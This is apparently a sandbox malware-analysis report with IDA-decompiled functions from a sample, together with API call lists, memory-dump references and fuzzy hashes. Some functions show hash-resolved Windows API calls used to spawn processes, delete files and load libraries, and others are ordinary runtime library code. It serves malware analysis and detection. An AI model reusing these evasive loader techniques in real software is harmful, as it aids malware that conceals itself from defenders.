				struct _STARTUPINFOW _v88;
				int _t15;
				long _t23;
				WCHAR* _t41;

				_t41 = __edx;
				_t23 = 0x44;
				E02252FB5(_t23);
				_v88.cb = _t23;
				E02252F84(0xf568ce83, 0xb32b3238, 0x173);
				_t15 = CreateProcessW(__ecx, _t41, 0, 0, _a4, 0, 0, 0,  &_v88,  &_v20); // executed
				if(_t15 == 0) {
					return 0;
				}
				if(_a12 == 0) {
					_push(_v20.hProcess);
					 *((intOrPtr*)(E02252F84(0xf568ce83, 0x2e998fdc, 0x167)))();
					_push(_v20.hThread);
					 *((intOrPtr*)(E02252F84(0xf568ce83, 0x2e998fdc, 0x167)))();
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				return 1;
			}

0x022535fd
0x022535ff
0x02253604
0x0225360d
0x02253632
0x02253638
0x0225363c
0x00000000
0x0225367d
0x02253643
0x02253651
0x02253669
0x0225366b
0x02253679
0x02253645
0x02253648
0x02253649
0x0225364a
0x0225364b
0x0225364b
0x00000000

APIs

CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,00000000,2895FB0B,166BA503), ref: 02253638

Memory Dump Source

Source File: 00000001.00000002.347505404.0000000002251000.00000020.00000001.sdmp, Offset: 02250000, based on PE: true

Associated: 00000001.00000002.347493243.0000000002250000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.347513236.0000000002259000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2250000_NWMEaRqF7s.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 2fd5766700db880170263c1083bdc509e4c9d4412641a4817670c8aa5dfc0925
Instruction ID: e5ba099c61546162bfeb8dfae7a8d85de8ce14edf0f39f43e18c16eebc362928
Opcode Fuzzy Hash: 2fd5766700db880170263c1083bdc509e4c9d4412641a4817670c8aa5dfc0925
Instruction Fuzzy Hash: C111E572A14229BFAB14DEE45C40CBFB7AEDB847A4B20852ABD15DB388DE71CD058560

Uniqueness

Uniqueness Score: -1.00%

Function 022527D0, Relevance: 1.5, APIs: 1, Instructions: 36
fileCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E022527D0(void* __ecx, void* __eflags) {
				short _v524;
				void* _t3;
				int _t10;

				_t3 = E02252674(0x2259160);
				_push(__ecx);
				_t21 = _t3;
				_push(_t3);
				_push(0x104);
				_push( &_v524);
				 *((intOrPtr*)(E02252F84(0xa83808e5, 0xb436274a, 0x156)))();
				E02252FDF(_t21);
				E02252F84(0xf568ce83, 0x70fee5ac, 0xcb);
				_t10 = DeleteFileW( &_v524); // executed
				return _t10;
			}

0x022527e2
0x022527e7
0x022527e8
0x022527ef
0x022527f0
0x02252800
0x0225280c
0x02252813
0x0225282e
0x02252834
0x0225283b

APIs

DeleteFileW.KERNELBASE(?), ref: 02252834

Memory Dump Source

Source File: 00000001.00000002.347505404.0000000002251000.00000020.00000001.sdmp, Offset: 02250000, based on PE: true

Associated: 00000001.00000002.347493243.0000000002250000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.347513236.0000000002259000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2250000_NWMEaRqF7s.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 1e570a35696aa29edbe450e440426ad68a9a1241a644a03fa55000e9d390346d
Instruction ID: ecb1c3088fbfc3163c936ec63c1655d3e8b3ef96f6c02fcae092b6884a613854
Opcode Fuzzy Hash: 1e570a35696aa29edbe450e440426ad68a9a1241a644a03fa55000e9d390346d
Instruction Fuzzy Hash: E3F02720750324A7E21471B46C45EBB329ECBC4321F14435AAD54D72C59E748D8185E2

Uniqueness

Uniqueness Score: -1.00%

Function 0040A3D5, Relevance: 1.5, APIs: 1, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A3D5(void* __ebx, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				void* __esi;
				void* __ebp;
				void* _t10;
				long _t11;
				void* _t15;
				void* _t16;
				struct HWND__* _t18;

				if(_a8 != 0x360) {
					_t18 = _a4;
					_t10 = E00409CBE(_t15, _t16, _t18, __eflags, _t18);
					__eflags = _t10;
					if(_t10 == 0) {
						L5:
						_t11 = DefWindowProcA(_t18, _a8, _a12, _a16);
						L6:
						return _t11;
					}
					__eflags =  *((intOrPtr*)(_t10 + 0x20)) - _t18;
					if(__eflags != 0) {
						goto L5;
					}
					_t11 = E0040A2E8(__ebx, _t16, _t18, __eflags, _t10, _t18, _a8, _a12, _a16); // executed
					goto L6;
				}
				return 1;
			}

0x0040a3df
0x0040a3e7
0x0040a3eb
0x0040a3f0
0x0040a3f2
0x0040a40b
0x0040a415
0x0040a41b
0x00000000
0x0040a41b
0x0040a3f4
0x0040a3f7
0x00000000
0x00000000
0x0040a404
0x00000000
0x0040a404
0x00000000

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a17bd75e753565c8c32fb72635d9df3520f5a8b73c1fc148d280dd7364c2ad56
Instruction ID: 3517ec6858cdfff4f58573c3d98e2797eedff766390b39a1751ee799ad3f77ef
Opcode Fuzzy Hash: a17bd75e753565c8c32fb72635d9df3520f5a8b73c1fc148d280dd7364c2ad56
Instruction Fuzzy Hash: 57F01236404219BBCF129F919C08CDB3B69FF19350F00C436F91561192C379C931ABAB

Uniqueness

Uniqueness Score: -1.00%

Function 004039B1, Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b936a4012c24706efac4ff068db0b712045a314d1aab1eb0685984eebb805aa3
Instruction ID: c99c244189d94d7dca9a997e17c70eaa2b4c72b9032cbafb8dd16296e0632aa4
Opcode Fuzzy Hash: b936a4012c24706efac4ff068db0b712045a314d1aab1eb0685984eebb805aa3
Instruction Fuzzy Hash: AFE080F51242119BCB204E24D4417AB7FD85B51736F205B3FD0B1E32D0D27689C3AB1A

Uniqueness

Uniqueness Score: -1.00%

Function 022425E0, Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

Part of subcall function 022414A0: SetLastError.KERNEL32(0000007F), ref: 022414DB

ExitProcess.KERNEL32 ref: 02242620

Memory Dump Source

Source File: 00000001.00000002.347463465.0000000002241000.00000020.00000001.sdmp, Offset: 02241000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2241000_NWMEaRqF7s.jbxd

Similarity

API ID: ErrorExitLastProcess
String ID:
API String ID: 1697593849-0
Opcode ID: 07604f6fba4cbb8b038043fd0e55161919fe005ddee500a1829a46dc0fba511e
Instruction ID: 329514e8e0ec79831a4a75fb02ef9c1a90581f3d935469546d1c120cee2942de
Opcode Fuzzy Hash: 07604f6fba4cbb8b038043fd0e55161919fe005ddee500a1829a46dc0fba511e
Instruction Fuzzy Hash: E6E092B8D10308BBEB04EFE0E809B9DBBB4EB00301F408154E80467244EB706A108FA1

Uniqueness

Uniqueness Score: -1.00%

Function 02254F76, Relevance: 1.5, APIs: 1, Instructions: 18
libraryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E02254F76(signed int __edx) {
				struct HINSTANCE__* _t6;
				void* _t8;
				void* _t11;
				intOrPtr _t14;
				WCHAR* _t15;
				void* _t24;
				signed int _t25;
				WCHAR* _t27;
				void* _t28;

				_t25 = __edx;
				_t27 = E02252674(_t11);
				E02252F84(0xf568ce83, 0xeaf577de, 0x134);
				_t6 = LoadLibraryW(_t27);
				_t14 =  *0x225a4c0; // 0x6031f0
				 *(_t14 + 4 + _t25 * 4) = _t6;
				_t15 = _t27;
				_t28 = _t24;
				_push(_t28);
				_t8 =  *((intOrPtr*)(E02252F84(0xf568ce83, 0x71eb2479, 0x14d)))();
				_push(_t15);
				_push(0);
				_push(_t8);
				return  *((intOrPtr*)(E02252F84(0xf568ce83, 0x5e575f04, 0x1e3)))();
			}

0x02254f78
0x02254f7f
0x02254f91
0x02254f97
0x02254f99
0x02254f9f
0x02254fa3
0x02254fa6
0x02252fdf
0x02252ff7
0x02252ff9
0x02252ffa
0x02252ffc
0x02253015

APIs

LoadLibraryW.KERNELBASE(00000000,33CEB415,1925BE3B,02255091,?,2895FB0B,?,?,02254CDA), ref: 02254F97

Memory Dump Source

Source File: 00000001.00000002.347505404.0000000002251000.00000020.00000001.sdmp, Offset: 02250000, based on PE: true

Associated: 00000001.00000002.347493243.0000000002250000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.347513236.0000000002259000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2250000_NWMEaRqF7s.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6e07970dde88a6d1209a13ae00c41007285756b310ceaf53c7f8f35357918dea
Instruction ID: 94ce1a58db0ecbdd5407fff5c23f3293d07e5fa08a696fa4c851a858f7f4075b
Opcode Fuzzy Hash: 6e07970dde88a6d1209a13ae00c41007285756b310ceaf53c7f8f35357918dea
Instruction Fuzzy Hash: 35D05E257553309B8618AAF9781896A66A6DFC92A5724C7299D1DCB2C4CE708C02CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02241820, Relevance: 1.3, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 0224182F

Memory Dump Source

Source File: 00000001.00000002.347463465.0000000002241000.00000020.00000001.sdmp, Offset: 02241000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2241000_NWMEaRqF7s.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 38dc218105373fd44773c0c130e0d4746c7c4daf83264b01d4a4c4a7fa72be85
Instruction ID: 64282340d9f3295d39147d2fd07414a40987247c4e94170d017205eebe5a0f09
Opcode Fuzzy Hash: 38dc218105373fd44773c0c130e0d4746c7c4daf83264b01d4a4c4a7fa72be85
Instruction Fuzzy Hash: A0C04C7A55420CAB8B04DFD8F884DAB37FDBB8C714B148548BA1D87200C630F9108BA4

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00410555, Relevance: 12.1, APIs: 8, Instructions: 129
filestringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00410555(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t38;
				long _t49;
				CHAR* _t50;
				CHAR* _t56;
				CHAR* _t59;
				void* _t61;
				int _t65;
				CHAR* _t74;
				void* _t75;
				void* _t76;
				void* _t89;
				void* _t90;
				CHAR* _t92;
				void* _t93;
				void* _t96;
				struct _WIN32_FIND_DATAA* _t98;
				void* _t100;
				CHAR* _t106;

				_t94 = __esi;
				_t90 = __edx;
				_t76 = __ecx;
				_t98 = _t100 - 0x13c;
				_t38 =  *0x443590; // 0xa920217c
				 *(_t98 + 0x140) = _t38 ^ _t98;
				_push(0x14);
				E0041F6EA(E0043298A, __ebx, __edi, __esi);
				_t92 =  *(_t98 + 0x14c);
				_t74 =  *(_t98 + 0x150);
				 *((intOrPtr*)(_t98 - 0x18)) =  *((intOrPtr*)(_t98 + 0x154));
				_t106 = _t92;
				_t107 = _t106 == 0;
				if(_t106 == 0) {
					L1:
					E004037E3(_t74, _t76, _t92, _t94, _t107);
				}
				if((0 | _t74 != 0x00000000) == 0) {
					goto L1;
				}
				_t49 = GetFullPathNameA(_t74, 0x104, _t92, _t98 - 0x14);
				if(_t49 != 0) {
					__eflags = _t49 - 0x104;
					if(_t49 >= 0x104) {
						goto L5;
					} else {
						E0040320E(_t98 - 0x10, E0040EA5E());
						 *(_t98 - 4) =  *(_t98 - 4) & 0x00000000;
						E0041038B(_t74, _t98, __eflags, _t92, _t98 - 0x10);
						_t56 = PathIsUNCA( *(_t98 - 0x10));
						__eflags = _t56;
						if(_t56 != 0) {
							L19:
							E00403036( &(( *(_t98 - 0x10))[0xfffffffffffffff0]), _t90);
							_t50 = 1;
							__eflags = 1;
						} else {
							_t59 = GetVolumeInformationA( *(_t98 - 0x10), _t56, _t56, _t56, _t98 - 0x20, _t98 - 0x1c, _t56, _t56);
							__eflags = _t59;
							if(_t59 != 0) {
								__eflags =  *(_t98 - 0x1c) & 0x00000002;
								if(( *(_t98 - 0x1c) & 0x00000002) == 0) {
									CharUpperA(_t92);
								}
								__eflags =  *(_t98 - 0x1c) & 0x00000004;
								if(( *(_t98 - 0x1c) & 0x00000004) != 0) {
									goto L19;
								} else {
									_t61 = FindFirstFileA(_t74, _t98);
									__eflags = _t61 - 0xffffffff;
									if(_t61 == 0xffffffff) {
										goto L19;
									} else {
										FindClose(_t61);
										__eflags =  *(_t98 - 0x14);
										if( *(_t98 - 0x14) == 0) {
											goto L10;
										} else {
											__eflags =  *(_t98 - 0x14) - _t92;
											if( *(_t98 - 0x14) <= _t92) {
												goto L10;
											} else {
												_t65 = lstrlenA( &(_t98->cFileName));
												_t89 =  *(_t98 - 0x14) - _t92;
												__eflags = _t65 + _t89 - 0x104;
												if(_t65 + _t89 >= 0x104) {
													goto L10;
												} else {
													_t97 = 0x104 - _t89;
													__eflags = 0x104 - _t89;
													E00403EBB(_t74, _t90, _t92, 0x104 - _t89, _t98,  *(_t98 - 0x14), _t97,  &(_t98->cFileName));
													goto L19;
												}
											}
										}
									}
								}
							} else {
								_push(_t74);
								E0041052A( *((intOrPtr*)(_t98 - 0x18)));
								L10:
								E00403036( &(( *(_t98 - 0x10))[0xfffffffffffffff0]), _t90);
								goto L5;
							}
						}
					}
				} else {
					E00402FE8(_t74, _t76, _t92, 0x104, _t98, _t92, 0x104, _t74, 0xffffffff);
					_push(_t74);
					E0041052A( *((intOrPtr*)(_t98 - 0x18)));
					L5:
					_t50 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t98 - 0xc));
				_pop(_t93);
				_pop(_t96);
				_pop(_t75);
				return E0041E5DF(_t50, _t75,  *(_t98 + 0x140) ^ _t98, _t90, _t93, _t96);
			}

0x00410555
0x00410555
0x00410555
0x0041055c
0x00410560
0x00410567
0x0041056d
0x00410574
0x0041057f
0x00410585
0x0041058b
0x00410590
0x00410595
0x00410597
0x00410599
0x00410599
0x00410599
0x004105a7
0x00000000
0x00000000
0x004105b5
0x004105bd
0x004105dc
0x004105de
0x00000000
0x004105e0
0x004105e9
0x004105ee
0x004105f7
0x004105ff
0x00410605
0x00410607
0x00410699
0x0041069f
0x004106a6
0x004106a6
0x0041060d
0x0041061d
0x00410623
0x00410625
0x0041063d
0x00410641
0x00410644
0x00410644
0x0041064a
0x0041064e
0x00000000
0x00410650
0x00410655
0x0041065b
0x0041065e
0x00000000
0x00410660
0x00410661
0x00410667
0x0041066b
0x00000000
0x0041066d
0x0041066d
0x00410670
0x00000000
0x00410672
0x00410676
0x0041067f
0x00410683
0x00410685
0x00000000
0x00410687
0x0041068b
0x0041068b
0x00410691
0x00000000
0x00410696
0x00410685
0x00410670
0x0041066b
0x0041065e
0x00410627
0x00410627
0x0041062b
0x00410630
0x00410636
0x00000000
0x00410636
0x00410625
0x00410607
0x004105bf
0x004105c4
0x004105cc
0x004105d0
0x004105d5
0x004105d5
0x004105d5
0x004106aa
0x004106b2
0x004106b3
0x004106b4
0x004106c9

APIs

__EH_prolog3.LIBCMT ref: 00410574
GetFullPathNameA.KERNEL32(?,00000104,?,?,00000014), ref: 004105B5

Part of subcall function 004037E3: __CxxThrowException@8.LIBCMT ref: 004037F7
Part of subcall function 004037E3: __EH_prolog3.LIBCMT ref: 00403804

PathIsUNCA.SHLWAPI(?,00000000), ref: 004105FF
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0041061D
CharUpperA.USER32(?), ref: 00410644
FindFirstFileA.KERNEL32(?,00000000), ref: 00410655
FindClose.KERNEL32(00000000), ref: 00410661
lstrlenA.KERNEL32(?), ref: 00410676

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: FindH_prolog3Path$CharCloseException@8FileFirstFullInformationNameThrowUpperVolumelstrlen
String ID:
API String ID: 4099955704-0
Opcode ID: 8d423071c246daf2073a97ce94b957f1acc84d53f3ea7e5e8a4362d51d6eacf4
Instruction ID: c95776d52dd1443ee05a1ca64a85c65a6502b148270e7fb7a51c131ffc65af19
Opcode Fuzzy Hash: 8d423071c246daf2073a97ce94b957f1acc84d53f3ea7e5e8a4362d51d6eacf4
Instruction Fuzzy Hash: EE41A17190010AABDB21EFA5CC45BFF777DEF54318F00052AF815E2291EB789995CA68

Uniqueness

Uniqueness Score: -1.00%

Function 0041E5DF, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E0041E5DF(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x443590; // 0xa920217c
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x446b48 = _t6;
				 *0x446b44 = _t22;
				 *0x446b40 = _t25;
				 *0x446b3c = _t21;
				 *0x446b38 = _t27;
				 *0x446b34 = _t26;
				 *0x446b60 = ss;
				 *0x446b54 = cs;
				 *0x446b30 = ds;
				 *0x446b2c = es;
				 *0x446b28 = fs;
				 *0x446b24 = gs;
				asm("pushfd");
				_pop( *0x446b58);
				 *0x446b4c =  *_t31;
				 *0x446b50 = _v0;
				 *0x446b5c =  &_a4;
				 *0x446a98 = 0x10001;
				_t11 =  *0x446b50; // 0x0
				 *0x446a4c = _t11;
				 *0x446a40 = 0xc0000409;
				 *0x446a44 = 1;
				_t12 =  *0x443590; // 0xa920217c
				_v812 = _t12;
				_t13 =  *0x443594; // 0x56dfde83
				_v808 = _t13;
				 *0x446a90 = IsDebuggerPresent();
				_push(1);
				E0042BADB(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter("@jD");
				if( *0x446a90 == 0) {
					_push(1);
					E0042BADB(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x0041e5df
0x0041e5df
0x0041e5df
0x0041e5df
0x0041e5df
0x0041e5df
0x0041e5df
0x0041e5e5
0x0041e5e7
0x0041e5e7
0x00424c05
0x00424c0a
0x00424c10
0x00424c16
0x00424c1c
0x00424c22
0x00424c28
0x00424c2f
0x00424c36
0x00424c3d
0x00424c44
0x00424c4b
0x00424c52
0x00424c53
0x00424c5c
0x00424c64
0x00424c6c
0x00424c77
0x00424c81
0x00424c86
0x00424c8b
0x00424c95
0x00424c9f
0x00424ca4
0x00424caa
0x00424caf
0x00424cbb
0x00424cc0
0x00424cc2
0x00424cca
0x00424cd5
0x00424ce2
0x00424ce4
0x00424ce6
0x00424ceb
0x00424cff

APIs

IsDebuggerPresent.KERNEL32 ref: 00424CB5
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00424CCA
UnhandledExceptionFilter.KERNEL32(@jD), ref: 00424CD5
GetCurrentProcess.KERNEL32(C0000409), ref: 00424CF1
TerminateProcess.KERNEL32(00000000), ref: 00424CF8

Strings

@jD, xrefs: 00424CD0

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID: @jD
API String ID: 2579439406-1635275382
Opcode ID: c447d9a5082a45e17c64b574762009e2935f38cb7a259609e812312e6fb4b33c
Instruction ID: 353eb8598e0df34b4eb95eb5e3ae3fd6c07366769aae313645bd4fdf51cf0d1b
Opcode Fuzzy Hash: c447d9a5082a45e17c64b574762009e2935f38cb7a259609e812312e6fb4b33c
Instruction Fuzzy Hash: 6D21F2BC5007A09FC711DF59FC496847BA0FB1B308F52543AE908D3661E7B465848F0E

Uniqueness

Uniqueness Score: -1.00%

Function 00402130, Relevance: 9.1, APIs: 6, Instructions: 83
windowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00402130(intOrPtr __ecx) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				struct HDC__* _v120;
				char _v124;
				int _v128;
				int _v132;
				int _v136;
				struct HICON__* _v140;
				intOrPtr _v144;
				void* __ebp;
				signed int _t37;
				int _t40;
				intOrPtr _t41;
				intOrPtr _t66;
				struct tagRECT* _t82;
				intOrPtr _t84;
				intOrPtr _t85;
				signed int _t86;

				_t37 =  *0x443590; // 0xa920217c
				_v32 = _t37 ^ _t86;
				_v144 = __ecx;
				_t40 = IsIconic( *(_v144 + 0x20));
				_t87 = _t40;
				if(_t40 == 0) {
					_t41 = E00405C6C(_t66, _v144, _t84, _t85, __eflags);
				} else {
					_push(_v144);
					E0040E7ED(_t66,  &_v124, _t84, _t85, _t87);
					_t88 =  &_v124;
					if( &_v124 != 0) {
						_v136 = _v120;
					} else {
						_v136 = 0;
					}
					SendMessageA( *(_v144 + 0x20), 0x27, _v136, 0);
					_v128 = GetSystemMetrics(0xb);
					_v132 = GetSystemMetrics(0xc);
					_t82 =  &_v28;
					GetClientRect( *(_v144 + 0x20), _t82);
					asm("cdq");
					_v12 = _v20 - _v28 - _v128 + 1 - _t82 >> 1;
					asm("cdq");
					_v8 = _v16 - _v24 - _v132 + 1 - _t82 >> 1;
					_v140 =  *((intOrPtr*)(_v144 + 0x74));
					_t79 = _v8;
					DrawIcon(_v120, _v12, _v8, _v140);
					_t41 = E0040E841(_t66,  &_v124, _t84, _t85, _t88);
				}
				return E0041E5DF(_t41, _t66, _v32 ^ _t86, _t79, _t84, _t85);
			}

0x00402139
0x00402140
0x00402143
0x00402153
0x00402159
0x0040215b
0x00402231
0x00402161
0x00402167
0x0040216b
0x00402173
0x00402175
0x00402186
0x00402177
0x00402177
0x00402177
0x004021a1
0x004021af
0x004021ba
0x004021bd
0x004021cb
0x004021dd
0x004021e2
0x004021f1
0x004021f6
0x00402202
0x0040220f
0x0040221b
0x00402224
0x00402224
0x00402243

APIs

IsIconic.USER32(?), ref: 00402153

Part of subcall function 0040E7ED: __EH_prolog3.LIBCMT ref: 0040E7F4
Part of subcall function 0040E7ED: BeginPaint.USER32(?,?,00000004,00405C83,?,00000058,00402236), ref: 0040E820

SendMessageA.USER32(?,00000027,?,00000000), ref: 004021A1
GetSystemMetrics.USER32 ref: 004021A9
GetSystemMetrics.USER32 ref: 004021B4
GetClientRect.USER32 ref: 004021CB
DrawIcon.USER32 ref: 0040221B

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: MetricsSystem$BeginClientDrawH_prolog3IconIconicMessagePaintRectSend
String ID:
API String ID: 1007970657-0
Opcode ID: 2f6cd35a6b9dfaeb7081f42fbc75d1cf632e4bdf7bd37a2e3ba394ddb8d91dbc
Instruction ID: 239a3fe864a438b672b26ed0143a2d062fb3f574ffa283ab5bdaab9dccb6ddd8
Opcode Fuzzy Hash: 2f6cd35a6b9dfaeb7081f42fbc75d1cf632e4bdf7bd37a2e3ba394ddb8d91dbc
Instruction Fuzzy Hash: 80311D75A00109DFDB14DFB8D985FAEBBB5BF48304F1082A9E549E7281DA30A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0040A094, Relevance: 6.0, APIs: 4, Instructions: 41
keyboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040A094(void* __ecx) {
				void* __ebx;
				void* __edi;
				signed int _t5;
				void* _t15;
				void* _t18;
				void* _t19;

				_t15 = __ecx;
				if((E0040C981(__ecx) & 0x40000000) != 0) {
					L6:
					_t5 = E00409BF3(_t15, _t15, _t18, __eflags);
					asm("sbb eax, eax");
					return  ~( ~_t5);
				}
				_t19 = E00403ED6();
				if(_t19 == 0) {
					goto L6;
				}
				_t18 = GetKeyState;
				if(GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
					goto L6;
				} else {
					SendMessageA( *(_t19 + 0x20), 0x111, 0xe146, 0);
					return 1;
				}
			}

0x0040a097
0x0040a0a3
0x0040a0eb
0x0040a0ed
0x0040a0f4
0x00000000
0x0040a0f6
0x0040a0aa
0x0040a0ae
0x00000000
0x00000000
0x0040a0b0
0x0040a0bd
0x00000000
0x0040a0d1
0x0040a0e0
0x00000000
0x0040a0e8

APIs

Part of subcall function 0040C981: GetWindowLongA.USER32 ref: 0040C98C

GetKeyState.USER32(00000010), ref: 0040A0B8
GetKeyState.USER32(00000011), ref: 0040A0C1
GetKeyState.USER32(00000012), ref: 0040A0CA
SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 0040A0E0

Memory Dump Source

Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
Opcode ID: 809d64707c866a6fea6fdfe0c08dbe96b0f4bf706804fe5c5b589de44f277889
Instruction ID: 09be2279584ced2a5f59b9ad430127016d441750cd54d9fdae9847761112cc12
Opcode Fuzzy Hash: 809d64707c866a6fea6fdfe0c08dbe96b0f4bf706804fe5c5b589de44f277889
Instruction Fuzzy Hash: 2CF0277234034E27EA207A764C41FEB71145F92BD8F018A3AB742FB1D1C9B9D812667A

Uniqueness

Uniqueness Score: -1.00%

Function 004313E8, Relevance: 4.5, APIs: 3, Instructions: 39
threadCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E004313E8() {
				signed int _v8;
				char _v16;
				void* __esi;
				signed int _t8;
				intOrPtr* _t15;
				intOrPtr _t16;
				char _t20;
				intOrPtr _t22;
				intOrPtr _t23;
				signed int _t24;
				int _t25;
				signed int _t27;

				_t8 =  *0x443590; // 0xa920217c
				_v8 = _t8 ^ _t27;
